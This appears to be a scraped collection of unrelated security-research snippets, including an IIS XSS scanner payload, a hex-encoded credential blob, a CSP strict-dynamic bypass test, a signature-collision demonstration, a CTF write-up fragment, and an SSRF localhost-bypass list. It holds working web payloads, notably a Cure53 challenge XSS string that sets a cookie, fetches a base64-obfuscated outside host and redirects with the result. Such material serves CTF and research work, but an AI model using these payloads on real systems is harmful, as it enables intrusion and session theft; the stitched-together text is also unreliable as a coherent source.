| import requests | |
| from requests import ConnectionError | |
| import sys | |
| requesttemplate = "http://%s/"; | |
| payload = "uncpath/<img src=x onerror=alert();>:" | |
| check = { "Microsoft", "ASP.NET", "IIS" } | |
| confirm = { "500.19", "<img src=x onerror=alert();>:" } | |
| if __name__ == "__main__": |
| import sys | |
| import binascii | |
| data = bytearray.fromhex("7b0a20a0226576e56e7422ba202270e1737377ef72645fe368616ee765222c8a202022f5736572ee616d65a23a2022e2636f6cec696e22ac0a2020a26f6c64df706173f3776f72e4223a20a23a5c78c3375c78c6345c6edc784146a9293743dc783135dc784430dc784633dc784445e9553b22ac0a2020a26e6577df706173f3776f72e4223a20a2395c78c6415c78b9395c78c3415c78c5445c78c6325853c75c7844c42d5c78c3325c78b8457a48eb222c0aa0202274e96d6573f4616d70a23a2031b5303138b5383836b03030308a7d0a") | |
| corrected = bytearray() | |
| # Print original data given | |
| for n in data: | |
| sys.stdout.write(chr(n)) |
| <!DOCTYPE html> | |
| <head> | |
| <title>CSP strict-dynamic + preload link in Chrome</title> | |
| <meta http-equiv="Content-Security-Policy" content="script-src 'nonce-123' 'strict-dynamic'" /> | |
| </head> | |
| <body> | |
| <script nonce="123"> | |
| var f = document.createElement("link"); | |
| f.rel = "preload"; // prefetch works perfectly fine | |
| f.href = "/foo.js" |
| param( | |
| [Parameter(Mandatory=$true)] | |
| [string] $Path, | |
| [Parameter(Mandatory=$true)] | |
| [string] $Wordlist, | |
| [array] $Exclude = @("*.jpg","*.png","*.dll","*.exe","*.so","*.o"), | |
| [string] $OutputFile = "usages.csv" | |
| ) | |
| function Prepare-OutputFile($OutputFile) { |
| string secret = "\ud8ab"; | |
| string secret2 = "\ud8cd"; | |
| if (!secret.Equals(secret2)) | |
| { | |
| Console.Out.WriteLine("The strings are not equal."); | |
| } | |
| computeSignature(secret, "timestamp", "payload"); // returns 1eba7aac5f10ee7aa985722256aa4125e8e59fe256386c8ab10295063d986e57 | |
| computeSignature(secret2, "timestamp", "payload"); // returns 1eba7aac5f10ee7aa985722256aa4125e8e59fe256386c8ab10295063d986e57 |
Description
https://www.hackerone.com/blog/hack-your-way-to-nyc-this-december-for-h1-212
How I found the flag
I ran an obligatory port scan, checked the IP using shodan.io, and did some basic directory discovery.
I found two open ports - 22 and 80 - and one directory /flag with a message from the creators.
As this wasn't really helpful, I tried to enumerate vhosts and found one resulting in a different response: admin.acme.org.
The EventSource API
The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.
https://developer.mozilla.org/en-US/docs/Web/API/EventSource
Last-Event-ID
Setting an ID lets the browser keep track of the last event fired so that if, the connection to the server is dropped, a special HTTP header (Last-Event-ID) is set with the new request.
I hereby claim:
To claim this, I am signing this object:
Works in latest Firefox 58.0.2 (Windows 10, 64-bit) (copy-paste into browser to preserve URL encoding):
https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%253dalert%253bthrow document.scripts[0].attributes[0].value%252f%252f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hRZ2FXUTlkMlZzWTI5dFpVMXpaejQ4TDNOamNtbHdkRDRtZEc5clpXNDk=`))%2bt})">&key=.element.innerHTML
When pasting into submit.cure53.berlin, the above has to be URL decoded once:
https://henhouse.cure53.berlin?value=
| # SSRF localhost (@omespino) | |
| http://127.0.0.1 | |
| http://[::]/ # ipv6 | |
| http://0/ | |
| http://localtest.me # dns to 127.0.0.1 | |
| http://2130706433/ # decimal | |
| http://0x7f000001/ # hex | |
| http://0x7f.0x00.0x00.0x01 # hex | |
| http://0177.0.0.01 # octal |